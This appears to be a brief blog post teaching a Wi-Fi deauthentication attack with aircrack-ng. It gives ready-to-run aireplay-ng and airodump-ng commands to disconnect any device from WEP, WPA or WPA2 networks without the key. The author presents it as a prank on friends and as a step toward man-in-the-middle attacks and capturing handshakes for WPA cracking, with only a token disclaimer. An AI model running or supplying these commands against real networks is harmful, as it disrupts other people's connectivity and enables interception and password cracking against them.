This is an old one but a fun one. I love doing this in my test environment and I have a lot of fun using this to prank my friends that choose to connect to it.
DISCLAIMER: Do not perform this attack on any network that you do not own. I am not responsible for any illegal use of this attack.
Now, I am assuming that you already know the basics of aircrack-ng and it’s suite of products.
This attack allows us to disconnect any device from any network.
- Works on encrypted networks (WEP, WPA & WPA2)
- No need to know the network key
- No need to connect to the network
In order to do this, us the following:
aireplay-ng --deauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]
aireplay-ng --deauth 100000000 -a 00:11:22:33:44:55 -c 55:66:77:88:99:00 mon0
NOTE: In some cases you must run Airodump-ng in order to run this command. Run it in another thread or terminal using:
airodump-ng --bssid 00:11:22:33:44:55 --channel 2 mon0
This trick is handy with social engineering cases and Man In the Middle attacks. You can also use this to capture the handshake, which is used for WPA cracking.